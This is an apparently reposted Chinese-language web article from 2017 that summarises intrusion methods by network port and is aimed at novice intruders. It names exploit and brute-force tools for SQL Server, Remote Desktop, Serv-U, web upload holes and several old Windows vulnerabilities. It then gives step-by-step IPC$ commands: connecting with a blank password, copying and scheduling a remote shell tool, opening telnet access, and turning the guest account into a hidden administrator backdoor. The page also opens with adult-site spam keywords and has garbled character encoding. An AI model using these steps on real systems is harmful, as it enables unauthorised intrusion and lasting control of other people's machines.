中文字幕在线观看,亚洲а∨天堂久久精品9966,亚洲成a人片在线观看你懂的,亚洲av成人片无码网站,亚洲国产精品无码久久久五月天

經(jīng)典總結(jié):各個(gè)網(wǎng)絡(luò)端口的入侵方法

2017-11-30    來(lái)源:

容器云強(qiáng)勢(shì)上線!快速搭建集群,上萬(wàn)Linux鏡像隨意使用

  希望對(duì)新手入侵有幫助!

  1. 1433端口入侵

  scanport.exe 查有1433的機(jī)器

  SQLScanPass.exe 進(jìn)行字典暴破(字典是關(guān)鍵)

  最后 SQLTools.exe入侵對(duì)sql的sp2及以下的系統(tǒng),可用sql的hello 溢出漏洞入侵。

  nc -vv -l -p 本機(jī)端口 sqlhelloF.exe 入侵ip 1433 本機(jī)ip 本機(jī)端口

  (以上反向的,測(cè)試成功)

  sqlhelloz.exe 入侵ip 1433 (這個(gè)是正向連接)

  2. 4899端口入侵

  用4899過(guò)濾器.exe,掃描空口令的機(jī)器

  3. 3899的入侵

  對(duì)很早的機(jī)器,可以試試3389的溢出(win3389ex.exe)

  對(duì)2000的機(jī)器,可以試試字典暴破。(tscrack.exe)

  4. 80入侵

  對(duì)sp3以前的機(jī)器,可以用webdav入侵;

  對(duì)bbs論壇,可以試試上傳漏洞(upfile.exe或dvup_delphi.exe)

  可以利用SQL進(jìn)行注入。(啊D的注入軟件)。

  5. serv-u入侵(21端口)

  對(duì)5. 004及以下系統(tǒng),可用溢出入侵。(serv5004.exe)

  對(duì)5.1.0.0及以下系統(tǒng),可用本地提升權(quán)限。(servlocal.exe)

  對(duì)serv-u的MD5加密密碼,可以用字典暴破。(crack.vbs)

  輸入一個(gè)被serv-u加密的密碼(34位長(zhǎng)),通過(guò)與字典檔(dict.txt)的比較,得到密碼

  6. 554端口

  用real554.exe入侵。

  7. 6129端口

  用DameWare6129.exe入侵。

  8. 系統(tǒng)漏洞

  利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,進(jìn)行溢出入侵。
 9. 3127等端口

  可以利用doom病毒開(kāi)的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。

  10. 其他入侵

  利用shanlu的入侵軟件入侵(WINNTAutoAttack.exe)。

  經(jīng)典IPC$入侵

  1. C:\>net use $">\\127.0.0.1\IPC$ "" /user:"admintitrators"

  這是用"流光"掃到的用戶名是administrators,密碼為"空"的IP地址(氣好到家如果是打算攻擊的話,就可以用這樣的命令來(lái)與127.0.0.1建立一個(gè)連接,因?yàn)槊艽a為"空",所以第一個(gè)引號(hào)處就不用輸入,后面一個(gè)雙引號(hào)里的是用戶名,輸入administrators,命令即可成功完成。

  2. C:\>copy srv.exe $">\\127.0.0.1\admin$

  先復(fù)制srv.exe上去,在流光的Tools目錄下就有(這里的$是指admin用戶的c:\winnt\system32\,大家還可以使用c$、d$,意思是C盤(pán)與D盤(pán),這看你要復(fù)制到什么地方去了)。

  3. C:\>net time file://127.0.0.1/

  查查時(shí)間,發(fā)現(xiàn)127.0.0.1 的當(dāng)前時(shí)間是 2002/3/19 上午 11:00,命令成功完成。

  4. C:\>at file://127.0.0.1/ 11:05 srv.exe

  用at命令啟動(dòng)srv.exe吧(這里設(shè)置的時(shí)間要比主機(jī)時(shí)間快,不然你怎么啟動(dòng)啊.

  5. C:\>net time file://127.0.0.1/

  再查查到時(shí)間沒(méi)有?如果127.0.0.1 的當(dāng)前時(shí)間是 2002/3/19 上午 11:05,那就準(zhǔn)備開(kāi)始下面的命令。

  6. C:\>telnet 127.0.0.1 99

  這里會(huì)用到Telnet命令吧,注意端口是99。Telnet默認(rèn)的是23端口,但是我們使用的是SRV在對(duì)方計(jì)算機(jī)中為我們建立一個(gè)99端口的Shell。

  雖然我們可以Telnet上去了,但是SRV是一次性的,下次登錄還要再激活!所以我們打算建立一個(gè)Telnet服務(wù)!這就要用到ntlm了

  7.C:\>copy ntlm.exe $">\\127.0.0.1\admin$

  用Copy命令把ntlm.exe上傳到主機(jī)上(ntlm.exe也是在《流光》的Tools目錄中)。

  8. C:\WINNT\system32>ntlm

  輸入ntlm啟動(dòng)(這里的C:\WINNT\system32>指的是對(duì)方計(jì)算機(jī),運(yùn)行ntlm其實(shí)是讓這個(gè)程序在對(duì)方計(jì)算機(jī)上運(yùn)行)。當(dāng)出現(xiàn)"DONE"的時(shí)候,就說(shuō)明已經(jīng)啟動(dòng)正常。然后使用"net start telnet"來(lái)開(kāi)啟Telnet服務(wù)!

  9. Telnet 127.0.0.1,接著輸入用戶名與密碼就進(jìn)入對(duì)方了,操作就像在DOS上操作一樣簡(jiǎn)單!(然后你想做什么?想做什么就做什么吧,哈哈)為了以防萬(wàn)一,我們?cè)侔裧uest激活加到管理組

  10. C:\>net user guest /active:yes

  將對(duì)方的Guest用戶激活

  11. C:\>net user guest 1234

  將Guest的密碼改為1234,或者你要設(shè)定的密碼

  12. C:\>net localgroup administrators guest /add

  將Guest變?yōu)锳dministrator^_^(如果管理員密碼更改,guest帳號(hào)沒(méi)改變的話,下次我們可以用guest再次訪問(wèn)這臺(tái)計(jì)算機(jī))

標(biāo)簽: 漏洞 權(quán)限 用戶

版權(quán)申明:本站文章部分自網(wǎng)絡(luò),如有侵權(quán),請(qǐng)聯(lián)系:west999com@outlook.com
特別注意:本站所有轉(zhuǎn)載文章言論不代表本站觀點(diǎn)!
本站所提供的圖片等素材,版權(quán)歸原作者所有,如需使用,請(qǐng)與原作者聯(lián)系。

上一篇:淺析中小網(wǎng)站如何對(duì)付DoS(拒絕服務(wù))攻擊

下一篇:Trojan.Win32.VB.et